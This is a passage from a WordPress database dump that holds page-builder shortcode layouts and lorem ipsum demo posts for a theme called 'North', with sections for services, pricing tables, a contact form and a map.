subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home13','','inherit','closed','closed','','978-revision-v1','','','2014-09-12 17:13:49','2014-09-12 17:13:49','',978,'http://highperformingstudent.com/2014/09/12/978-revision-v1/',0,'revision','',0),(271,1,'2014-07-03 12:10:47','2014-07-03 12:10:47','Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of \"de Finibus Bonorum et Malorum\" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, \"Lorem ipsum dolor sit amet..\", comes from a line in section 1.10.32.','A simple video post','','publish','open','open','','video-post-test','','','2014-07-03 12:10:47','2014-07-03 12:10:47','',0,'http://localhost/north1/?p=271',0,'post','',0),(815,1,'2014-07-02 23:39:31','2014-07-02 23:39:31','Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of “de Finibus Bonorum et Malorum” (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, “Lorem ipsum dolor sit amet..”, comes from a line in section 1.10.32.\n“On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.”\n“Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.”','1914 Translation by H. Rackham','','publish','open','open','','1914-translation-by-h-rackham-2','','','2014-07-02 23:39:31','2014-07-02 23:39:31','',0,'http://veented.com/themes/north/?p=815',0,'post','',0),(844,1,'2014-07-01 06:45:22','2014-07-01 06:45:22','Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of “de Finibus Bonorum et Malorum” (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, “Lorem ipsum dolor sit amet..”, comes from a line in section 1.10.32.\n“On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.”\n“Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.”','Standard Blog Post','','publish','open','open','','standard-blog-post','','','2014-07-01 06:45:22','2014-07-01 06:45:22','',0,'http://veented.com/themes/north/?p=844',0,'post','',0),(985,1,'2014-09-12 17:27:02','2014-09-12 17:27:02','[vc_row css=\".vc_custom_1410556411627{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" video_bg=\"vimeo\" vimeo=\"71617061\" bg_overlay=\"darker\"][vc_column width=\"1/1\"][vntd_fullscreen_slider text_static=\"We are North! We love to design. We are happy with you are!\" style=\"style1\" posts_nr=\"6\" button1_label=\"Purchase\" button1_url=\"#\" custom_links=\"Welcome to North,We are Designers,We Love to Design\" text_dynamic=\"We create awesome themes!,We are creative Designers,We love to Design\" button2_label=\"Read More\" button2_url=\"#about\" animated=\"no\" bg_overlay=\"dark2\" buttons_color=\"dark\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply. [list icon=\"caret-right\" color=\"dark\" background=\"yes\"] [li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li] [li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li] [li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li] [li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li] [/list] Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#facts\" color=\"black\" scroll=\"yes\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405492003813{border-top-width: 1px !important;padding-bottom: 10px !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709770765{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709776984{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709787994{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1410557528085{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dots_dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][vntd_twitter account_id=\"envato\" count=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409759263341{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384b99d-fe26920f-a91e\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"size-full wp-image-926 alignleft\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384b99d-fe26920f-a91e\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"size-full wp-image-927 alignright\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6b99d-fe26920f-a91e\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, 